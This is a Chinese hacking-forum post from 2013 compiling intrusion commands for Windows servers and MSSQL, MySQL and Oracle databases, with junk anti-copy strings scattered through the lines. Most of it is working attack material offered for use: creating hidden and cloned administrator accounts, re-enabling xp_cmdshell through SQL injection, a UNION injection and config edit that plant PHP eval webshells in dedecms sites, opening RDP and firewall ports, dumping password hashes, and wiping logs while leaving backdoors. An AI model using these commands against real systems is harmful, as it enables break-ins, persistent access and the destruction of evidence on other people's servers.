中国网络渗透测试联盟

标题: 渗透技术大全 [打印本页]
作者: admin    时间: 2013-2-27 21:24
标题: 渗透技术大全

  t6 \$ j8 K+ d; S& j7 s7 m1.net user administrator /passwordreq:no
  @6 y) i2 T1 {/ I+ q这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了+ [' f  z3 D$ c. x
2.比较巧妙的建克隆号的步骤
; s' ?: I% F% [4 m先建一个user的用户
" k$ w0 O7 L) y) ~然后导出注册表。然后在计算机管理里删掉+ T. R6 G) \" r
在导入,在添加为管理员组
  ^+ z! e% _* d# l3.查radmin密码
  M; Y8 Q/ S. `2 T! n* Y; greg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg+ \$ T; K( c( n# ]; {# S
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
% o& m3 w+ C2 d: ^6 H: Q' C& a建立一个"services.exe"的项
3 o+ w% i# Y9 ~1 P9 \4 V) |3 x+ A再在其下面建立(字符串值)
# \' c: U  _( d. Q键值为mu ma的全路径% _/ V9 |+ t3 p" O- c
5.runas /user:guest cmd/ [3 g( e' h  M! R, _% l
测试用户权限!
  o3 G1 d" Q. F+ J6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?  g& X1 e) K4 q7 ?1 p9 N5 ]  {% q
7.入侵后漏洞修补、痕迹清理,后门置放:
$ G- |) Y7 @0 a8 a  g$ U  ^基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门  J* Z7 \, q! d( l6 P
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c; C4 V9 s/ ~& f: V7 M! D/ V

% r% `7 f  s" s8 P+ `  |$ Vfor example
! i, }5 U7 f; a% E9 _  B+ _4 a* ~7 N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'' c3 }  d  u/ K
" r& B1 X& y: @1 N$ r7 ^  Y6 U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'# g( L" B/ Z' N; _' V
$ Q) b* [; P0 O" S! S+ |& @* A8 P) h) p
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了
; _; I) H0 g3 a+ d% S: m, }8 M如果要启用的话就必须把他加到高级用户模式
7 L' ~' I; Z9 |& k* @4 \, g可以直接在注入点那里直接注入3 V/ Q8 e0 M( p: D' u3 ^4 \: ~% {
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
, S1 G. Z5 Q$ T' n7 Q# Z! o7 U然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--4 a7 s; I' {. ^4 b. ^6 t$ ?) [$ r2 ?
或者. D3 j: P1 i4 X4 i
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
1 e7 k- P+ Y* [6 V来恢复cmdshell。
/ G& @+ f! o7 D" O& E
5 o: r7 o" c0 s7 [2 S6 `分析器
- E! a- O3 ?" K/ g7 X" XEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--8 F/ K0 p1 f2 ?( ^& c
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
7 H% B* u# x$ X# Y10.xp_cmdshell新的恢复办法1 L% f4 e& m9 l3 X( A2 |0 P# y. E
xp_cmdshell新的恢复办法
7 ?0 m5 g- i9 N* M, k扩展储存过程被删除以后可以有很简单的办法恢复:
& L8 \0 o: A# @2 r删除
9 ?9 A2 ]7 `: h/ |) X' a4 u4 ^drop procedure sp_addextendedproc
1 u. w1 G  W- ?drop procedure sp_oacreate5 b6 v# [/ w$ @9 C5 |
exec sp_dropextendedproc 'xp_cmdshell'5 U& w0 r3 \! F* X; {) @
+ M1 m6 {) A* ~/ `# z: O" u
恢复
1 s1 C4 |5 C" B% a1 @dbcc addextendedproc ("sp_oacreate","odsole70.dll")
$ {+ l! S' Y2 Z9 p$ K; v- p" ydbcc addextendedproc ("xp_cmdshell","xplog70.dll")4 W7 R  i0 H2 Y; w! z
+ f9 M$ p9 a2 k! m3 @
这样可以直接恢复,不用去管sp_addextendedproc是不是存在3 R- \! M2 s) I  [" a6 Z6 ?

- k1 r- y: o% z-----------------------------
6 _; C# T) y; ]( r4 G8 R
( G  |# F* z" ^1 s4 u; t5 q4 l删除扩展存储过过程xp_cmdshell的语句:
5 L& l! @& J0 \0 Jexec sp_dropextendedproc 'xp_cmdshell'
! o* \; X4 \) v  w# n& Y& {. B% |+ \8 ]. v( T
恢复cmdshell的sql语句
* f0 `3 T$ z7 O6 O+ |2 |exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
# q  Q% f$ i% |* Z( m- q0 _7 j4 T3 n# i- u) W1 ?( l+ y  X7 ]

2 Y' N) o5 u( G7 z, a: G5 E. @开启cmdshell的sql语句$ H: H! |3 ~6 g; ?- S$ Y$ g) _0 W
# I! M! {6 Z  u# ^
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
+ r  c$ J0 u! U* Y9 q
# {0 o9 f$ t5 S判断存储扩展是否存在2 q# z2 ]8 r4 q+ p
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
5 q+ }( y+ x% r返回结果为1就ok6 e% Q5 C8 }5 e

" W0 R* p. n$ Y恢复xp_cmdshell& Z5 B$ \6 P4 D" I, a
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'9 E6 h" x; H8 l6 L( O# C: J  a
返回结果为1就ok
4 T/ W+ O% _1 v+ _6 j. k1 K9 U  o$ z) E
否则上传xplog7.0.dll3 D; k; ]6 y8 R6 m& Y$ {
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
* i" @6 Y/ ]) i9 g0 S* u5 Z) D0 _7 ~' P# G
堵上cmdshell的sql语句
% a) _& J# g5 l! b. X$ C! Z! m3 wsp_dropextendedproc "xp_cmdshel5 c/ W' H+ R- Q) {. L$ k2 n4 h; Z
-------------------------6 g$ {9 L; v* l% }  i' [4 [
清除3389的登录记录用一条系统自带的命令:
4 R  Z* S. t2 }( w, Q5 I8 Preg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f
1 M% G3 ]1 y$ S( S. a3 Q7 C# a/ i. {* P' i+ v" C
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
7 V$ h  f* n0 }) l在 mysql里查看当前用户的权限
  A. u- I6 n) |% Q. L) O/ ushow grants for  9 f: d( ?% ]: y% i

* |2 [! {" W6 E8 N6 ~+ Z4 u. e以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。( T( R1 l& Q/ ~
) T" X0 L9 h) @
) N5 K3 w6 w& t1 k' A
Create USER 'itpro'@'%' IDENTIFIED BY '123';
9 W8 v2 c& k* ]' S! ]4 p
; G$ b- ?2 ~2 J7 vGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
2 p. i- Q. t$ e9 f% B! f0 N% G4 G
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
8 U' V1 T4 I0 G# c1 y
) ?$ S! @3 h% }: @" j/ OMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;! u. H& |+ c; \3 n2 o

- W4 l8 j& R# l! A" E搞完事记得删除脚印哟。
8 g* U, O: c1 c7 d: @* u' m; a; |  ?8 L; G; U
Drop USER 'itpro'@'%';
* |- o4 x& ~+ [8 s0 B7 Q) N: D
9 \! @, e; t; O  e2 M; {( vDrop DATABASE IF EXISTS `itpro` ;
% R2 @  f" n% ]4 g* w; u. `, t# e8 {7 S- D
当前用户获取system权限
8 `; ]9 A' G# q5 U' H+ \! Psc Create SuperCMD binPath= "cmd /K start" type= own type= interact
4 F0 ]' U$ Z4 X- K9 @& psc start SuperCMD$ q9 Q0 d/ {9 ~
程序代码
" i/ m6 V1 I0 X<SCRIPT LANGUAGE="VBScript">
1 o* \# ^+ X, {5 Zset wsnetwork=CreateObject("WSCRIPT.NETWORK")9 H4 J) J% g: `2 m; z
os="WinNT://"&wsnetwork.ComputerName( |% B; O; m! E+ X2 v
Set ob=GetObject(os)
$ D" l* ?* e. I, mSet oe=GetObject(os&"/Administrators,group")
# n1 `: h* _6 K) @1 q- `Set od=ob.Create("user","nosec")
; ^) n. u# h$ Lod.SetPassword "123456abc!@#"
# j/ n' u% d3 C. E, |8 Kod.SetInfo
' S$ e: u. Q" W0 S* W1 X# SSet of=GetObject(os&"/nosec",user)+ a, {$ M) \. [1 Q
oe.add os&"/nosec"
! S! @) `, T: l9 o5 B8 F; B- _</Script>
  X. t' m/ h) h6 A<script language=javascript>window.close();</script>1 [' r( }5 j1 h

* Q+ F5 S1 `; {% a1 A- G+ N' Z, S/ N4 o$ J# [+ c) H$ Z
% k, n5 a, D. u( e2 A( y* o

" i3 l. c- G: H7 f突破验证码限制入后台拿shell
6 L- a- D9 V0 O0 g; x: a程序代码
/ \( f7 q* d7 Y5 n# M5 E& S( |! lREGEDIT4 - p' T) X. q2 x) j
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] ; u$ l7 n% ^3 \- A0 d! f- ?/ ]5 l
"BlockXBM"=dword:00000000; j0 H5 d$ [- J2 H
0 f, d- K. d' ]
保存为code.reg,导入注册表,重器IE$ C% d# D7 l. B" _
就可以了
3 M& p1 [5 u# \! \2 X  G& Gunion写马
# y; N( L/ L7 I- _3 E+ d程序代码& T" h5 ]. _. ~4 D" c
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
+ |$ r: c( l- K. h( }. v% o1 p1 Q7 S
应用在dedecms注射漏洞上,无后台写马
4 m2 u, l/ y+ `+ d# Sdedecms后台,无文件管理器,没有outfile权限的时候! e1 R' _% k6 _2 n1 `0 U: ^( S
在插件管理-病毒扫描里9 B- G' O% e, k; C6 V! T2 _: }
写一句话进include/config_hand.php里
+ w8 @% N. N0 j6 u4 K5 Y# u: N程序代码+ S5 X: c& H+ M$ k; @" V- z  I# l
>';?><?php @eval($_POST[cmd]);?>& V5 f! Y$ Q4 v# N
% K" x! D0 R  S- Q. V# @
% s3 ?0 ^; t3 x
如上格式1 _2 A- d% j- ]4 X! |
( `1 I( v: v) V5 ^2 b. X; d0 e7 K) Q
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解/ u$ S6 v, ~/ \! D7 I& V( W: t
程序代码
. `1 S4 h( ?) A4 j7 d( qselect username,password from dba_users;
/ E& u4 ~0 l' T, o+ Z7 {' k9 y# i3 f- P* |
" f6 ]6 G, Z4 }, u3 Z) \3 C
mysql远程连接用户: n' p) E$ h2 w, q0 O! ]
程序代码" X; @! q( F1 b, ?0 r) J
9 s! M5 w1 v* D- `2 C
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';$ k$ d2 @% g. S; U7 m2 ?
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
3 {$ N9 k- `3 L7 zMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0: d! I' v. ^( \
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
5 n0 I, C7 ^0 ?) R% \
' Z3 u3 e- R6 l2 h% z6 ?6 s8 [, [3 }5 u" g1 ^4 [. a/ G

# e; |: ?. Y% X! Y9 f) _9 Z
; n* X1 I: [4 k. ?7 q. J* o) Yecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
' E5 }5 U2 b" a, B- {" i! o+ J
9 X) z+ l, [9 U9 X3 i1.查询终端端口1 U2 ~* G  T" u- x, y# p& ?

5 B) K  `. x& {xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber6 Y% _8 {' r" G- w
! N9 f* W) _1 q4 f4 \+ D7 _
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
* K9 ~! c0 G) z; A& Ctype tsp.reg  y. o$ y% B, G' S6 W( ?
+ Q7 ^7 R* P3 q! ^5 Q% u7 r! }
2.开启XP&2003终端服务  M* L6 W" ?1 _( f4 d1 D

; H' e! R; c% n$ K6 Z$ x- X/ [5 \! q4 V
9 \- H( }4 L  \$ m& sREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f9 _. J9 Q& @" U; Q  g# x' K
3 m- n. g" ?( O, c

7 |+ ], A, {5 _1 X3 F9 TREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f0 T" ?  v- Z  ]- O4 b& _  @6 ^
) N- ?4 Y" W/ ^
3.更改终端端口为20008(0x4E28)$ T8 ?1 e4 }% h* |
8 E7 `6 q9 p! [, A& \' q4 i" ^
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
7 `, _; T! d% G+ Y+ S% s# d5 F' R: }. {9 {; _0 G
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f; @. ]- f+ U5 w: u! n0 w
" ~/ h' }3 L- w6 T& S  B) |
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制' H( F5 {* V4 a* K" \" r" R

) `* `/ B$ v# b0 o6 a8 \0 M5 t' tREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
9 a7 M5 p4 _1 S8 F; z4 W9 Z6 o& g& a8 N1 n* _1 a2 X- C

* l/ J5 ^5 j$ d5.开启Win2000的终端,端口为3389(需重启)
& h7 Q1 {' u& f) O- o; h# G9 P
2 _% N% u2 X9 X9 E, Wecho Windows Registry Editor Version 5.00 >2000.reg & `1 u9 b0 ]5 c; |1 ?
echo. >>2000.reg, \* D% {7 H- }& n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
5 A! ~8 V3 H. F9 Techo "Enabled"="0" >>2000.reg
, |4 ~- G! u$ q( q5 g8 y1 Oecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
# }% _6 N8 B6 T( @  J7 k2 ?0 secho "ShutdownWithoutLogon"="0" >>2000.reg - B) P7 V$ [, U/ D+ p- G1 _/ `
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg / T) s: B+ F) d$ [  ~& x- O
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
7 c6 {! K, c0 Z7 o5 h9 Y/ gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 9 F1 u8 b" ^4 a* K
echo "TSEnabled"=dword:00000001 >>2000.reg
# e3 M& W& ]" Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg $ x5 L4 s2 z- v6 z8 {- W3 v
echo "Start"=dword:00000002 >>2000.reg . [4 Y$ V2 V& H' [( e: n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
+ R: ?/ y% _! W2 X+ T, T  h1 I) Yecho "Start"=dword:00000002 >>2000.reg
7 H& p3 }2 T/ d3 {echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
9 L( C" ^! y8 q8 [5 W+ Z7 G4 pecho "Hotkey"="1" >>2000.reg
0 C7 ?/ g& z- r( Q$ R7 U. @echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
! t) S; V9 L' _echo "ortNumber"=dword:00000D3D >>2000.reg
6 M/ \) Z( {9 g5 t* c" w  i6 iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg " h6 n5 c5 b( s" S4 D2 W
echo "ortNumber"=dword:00000D3D >>2000.reg% Z; T5 G1 C4 t

- b+ f% g( U; e: l2 K2 x6 n+ G6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
$ X2 F- v: X* C2 J' r* n8 K( a  |  }) L0 `- w$ D7 `; m0 H- K
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
. A( y, q! }. F/ W+ V' T(set inf=InstallHinfSection DefaultInstall)9 k3 l* v2 m# u) }! |! i7 e
echo signature=$chicago$ >> restart.inf3 O$ T  a- W5 T1 k
echo [defaultinstall] >> restart.inf2 q! @8 X# J( v. n( c. T& r7 i
rundll32 setupapi,%inf% 1 %temp%\restart.inf: [2 E5 [/ C! M
4 R, k% o/ b- y
9 N# T: ~9 A( s- ]9 u: c( F
7.禁用TCP/IP端口筛选 (需重启); T5 k# b% u! V: Q% B# [

! n+ @* C: ]$ D7 S; H' hREG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f# c5 z9 H4 ^: W$ E8 C
' Q; x! i- f: u
8.终端超出最大连接数时可用下面的命令来连接
$ o. g" r4 e, k0 |* U4 A5 {8 M
: E/ R  Q( Z. m1 `9 H( G3 B, Ymstsc /v:ip:3389 /console
2 q0 _2 X0 w6 Z* U9 h1 T0 g6 k8 _( a3 G2 i- |7 r" }1 P' {
9.调整NTFS分区权限
" b) J4 Y2 [5 G! K3 G; ?! f5 |- L* @- z& a) ?
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)2 r6 D6 |2 ?, B9 A# z3 z+ @
2 W8 d& m" f2 G. H* O$ r+ v$ B
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)& [, {% ~. B9 p  _  t/ X

. G0 N5 ]) `& ~$ @' `3 L------------------------------------------------------, I8 O7 i- H% R! k" j
3389.vbs - |# c, g; U# B2 ~+ J; ~0 q( R% P$ F
On Error Resume Next
. h5 M1 u- t7 a6 h1 X- [const HKEY_LOCAL_MACHINE = &H80000002
; f. X) y2 M( |+ P8 }& d) ZstrComputer = "."
9 M. B  `7 [7 k3 ?1 @% t* |* `Set StdOut = WScript.StdOut% ~: J5 F+ ~3 j: K1 u: A! _! M, q* F
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_4 d+ \+ O; x# h; R  A
strComputer & "\root\default:StdRegProv")
% Z" d6 G! N. _* M4 Y7 u4 sstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
/ b2 j; c: ]4 v& R2 j1 Joreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath; D7 x3 U2 K3 H
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"' H9 `% Q: {9 I; d( n* |
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
! J- x! p1 k4 B+ [: D; U1 xstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
9 P( V2 q9 L+ kstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"9 ^" T  [; x. r  O2 P
strValueName = "fDenyTSConnections"- t2 S" S0 h1 Y* j% U; L
dwValue = 0: I% |, P" |8 W; K1 M+ w- w
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
& R1 N% c0 t/ N; ]strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"5 ~) q' u  ?; r! E% X) n2 n" h
strValueName = "ortNumber"
* b  |* H8 f# d+ g5 m+ ldwValue = 33893 ?# K* F6 R% |: Y# k$ g7 P
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
" n3 E& ]. M+ {! p6 BstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"/ s& T: U9 l0 L' |
strValueName = "ortNumber"( U& e0 n/ k( G& p+ A" ~
dwValue = 3389
5 b' K$ C4 u: l2 eoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
4 Z+ w5 s* O& M4 q, i5 I. ?Set R = CreateObject("WScript.Shell") 2 U. F9 }$ d6 R  a, R: ]9 ~. b, k* J
R.run("Shutdown.exe -f -r -t 0") ; h0 W# [+ V; F) l. A. a, u

9 p+ w% J3 k$ @$ g6 \4 s删除awgina.dll的注册表键值
7 p: M) w' M: g0 q# O程序代码% h# F0 t- }) m& V3 Y6 y

/ ~$ Q9 @; ]/ J2 |* ?8 Oreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f8 J7 L% @5 D- G+ S9 H
; k; Z: w: G% s2 i$ U# a6 ?

7 ~8 x: B$ q; ~) Q- ~* E' p6 e
: w1 k# ~- W3 x
" K# D6 H+ c3 m程序代码1 [+ n/ f3 ?9 |* ?7 f. z
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash7 U. \9 ?- I5 `% S1 H
  s' T/ K7 R8 V, T% S
设置为1,关闭LM Hash0 O, _% D) t8 X( f1 C  M
& z' ?9 I" h- s7 A) K
数据库安全:入侵Oracle数据库常用操作命令/ o8 C9 m9 K' \  n; z( J% o  b% e
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。! M3 `/ ~4 s% Y% i% G; d+ J4 a) L: e
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
( z& J2 b# r0 c- q: `2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
" w6 C0 @$ s$ j1 p/ b8 R3、SQL>connect / as sysdba ;(as sysoper)或
0 p. O; c% O7 B0 P. Lconnect internal/oracle AS SYSDBA ;(scott/tiger)! A4 l; k/ J# t+ k2 G! p
conn sys/change_on_install as sysdba;5 D: z6 @$ i2 \+ A# g) m. i) I1 ]
4、SQL>startup; 启动数据库实例
, e4 f$ R6 j5 t5、查看当前的所有数据库: select * from v$database;7 G$ C5 g$ F9 r. y; N& Z9 t
select name from v$database;6 j' d6 \" X# t' F* T( M
6、desc v$databases; 查看数据库结构字段
$ w$ q# b% W/ A2 N7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
" L; ~- t) z* f5 [SQL>select * from V_$PWFILE_USERS;4 R2 A9 r5 G) U3 M% h6 o
Show user;查看当前数据库连接用户
1 R0 ^7 E4 Y- w$ }, x* ]' q8、进入test数据库:database test;7 }# n# N: q6 i( n3 `1 G6 x
9、查看所有的数据库实例:select * from v$instance;
# ]# R: H+ y2 J2 p. T如:ora9i
$ u" B# f8 c* c10、查看当前库的所有数据表:* }0 n0 w: L5 U. c9 l- ]
SQL> select TABLE_NAME from all_tables;
, q7 d8 g( ]5 R0 a2 q% Z) Tselect * from all_tables;
0 D" j1 }' v- n8 q' T1 ^  C4 LSQL> select table_name from all_tables where table_name like '%u%';4 w+ ~( n" }$ }% n4 a
TABLE_NAME0 z: ]/ u7 ?5 P2 ^3 w& F5 t6 K2 S/ T
------------------------------
4 C# [- L6 c8 ^: m2 K' @_default_auditing_options_$ i3 i& G: \$ Z) ~- `5 k
11、查看表结构:desc all_tables;4 ?; `) w4 f4 ?$ @3 g* K( e2 n% v
12、显示CQI.T_BBS_XUSER的所有字段结构:
9 O" S& t& @6 L0 G+ i5 r. T( [desc CQI.T_BBS_XUSER;
) L' e5 W& y& r4 d13、获得CQI.T_BBS_XUSER表中的记录:( H- h1 B0 q9 ?4 g4 V1 c. m9 D
select * from CQI.T_BBS_XUSER;
7 \' J: L/ O$ ?, ~1 ?) v  N( a' M14、增加数据库用户:(test11/test)$ h; `' p6 s) U1 R" I
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;/ K+ V2 ]; ?+ ?
15、用户授权:+ N% i( m( A5 U% M! R: g7 X
grant connect,resource,dba to test11;
5 t3 X( K3 ?, k/ Egrant sysdba to test11;+ P. k2 t; ~2 }4 x5 b# O5 I
commit;' W% h2 K2 D, G0 k1 ~
16、更改数据库用户的密码:(将sys与system的密码改为test.)0 {) \' E7 v7 H
alter user sys indentified by test;( s/ V0 }2 x5 l/ S" u
alter user system indentified by test;% G) p/ e# G/ U" n8 u, R
" o0 ]0 d" M9 b5 P) ?8 O8 L- L/ Q
applicationContext-util.xml
# ~  T9 a9 B+ M8 o, e- AapplicationContext.xml0 X- d& Z+ F1 W& A( g4 s
struts-config.xml  h0 l) ^3 v0 M3 O" g
web.xml/ {" Y2 ], J0 \4 L; _
server.xml
0 L  M5 M5 F: z6 f% o" ztomcat-users.xml
% P: h. P' Y. ^/ y. o/ }. thibernate.cfg.xml+ y4 }1 o7 T  Q9 e1 _: q" o7 E' F
database_pool_config.xml0 X" r* v6 F+ H

/ ~5 M* c8 Y* n9 M) F
. W( D( [, {0 s7 b1 b* h! w! m$ f, n/ k\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
/ h% D7 j2 U1 x\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
& F7 C( p# B3 |8 p" }8 @  i; f0 v9 L\WEB-INF\struts-config.xml  文件目录结构  e4 f6 e* E6 l8 N2 T

  v- t1 o7 q! Q: D, D7 d/ a; pspring.properties 里边包含hibernate.cfg.xml的名称
3 @7 _0 m3 Q5 e4 d. J6 g% `# f9 ?3 H/ x1 K) e7 [

4 H* ?1 S0 G0 i# SC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml" n9 Z. D% o, S) {: {
+ {: w6 a9 K! a7 K8 `1 Y
如果都找不到  那就看看class文件吧。。) l+ {  |+ S# L. N6 u1 M
4 N8 Z, U$ e% L5 j* h: A, Y4 p
测试1:
1 b# v0 q3 I+ j. z  L* U- LSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
$ A6 M1 A0 t/ \! m) D8 }* C. M8 B. E. C3 P7 N3 ~% }
测试2:1 H* J: w8 e; [0 D% q7 z

' D+ {9 z; ^) Z3 }- _; Screate table dirs(paths varchar(100),paths1 varchar(100), id int)# F! R( s* K* p6 _8 |( J
: L  l* @* R* ~' E9 D  w: Z8 _, Y
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--) |( a' W- E4 [

% Z2 p' N' z3 k9 e' fSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
9 p3 X, w* J% Z9 {- Z* `. O8 t. v  d( Y6 J
查看虚拟机中的共享文件:
( a/ h5 L0 T$ b6 G4 S9 h4 J4 U在虚拟机中的cmd中执行
, }$ r3 B% a+ p) q$ k3 U- q\\.host\Shared Folders
& m8 t4 e) s0 A5 Y/ O. @
- A3 [/ o$ }$ W2 B# l8 Ycmdshell下找终端的技巧
% ]2 K5 j" [) t7 X5 Y找终端:
1 P* w: p+ y) G. I3 O第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
! V3 V1 ]- ^( q; {   而终端所对应的服务名为:TermService 7 G7 o% N- i8 a; d$ r1 P
第二步:用netstat -ano命令,列出所有端口对应的PID值!
6 V: @  m% N4 }' J" X$ L' e7 t   找到PID值所对应的端口* w! L8 u1 m/ V) C

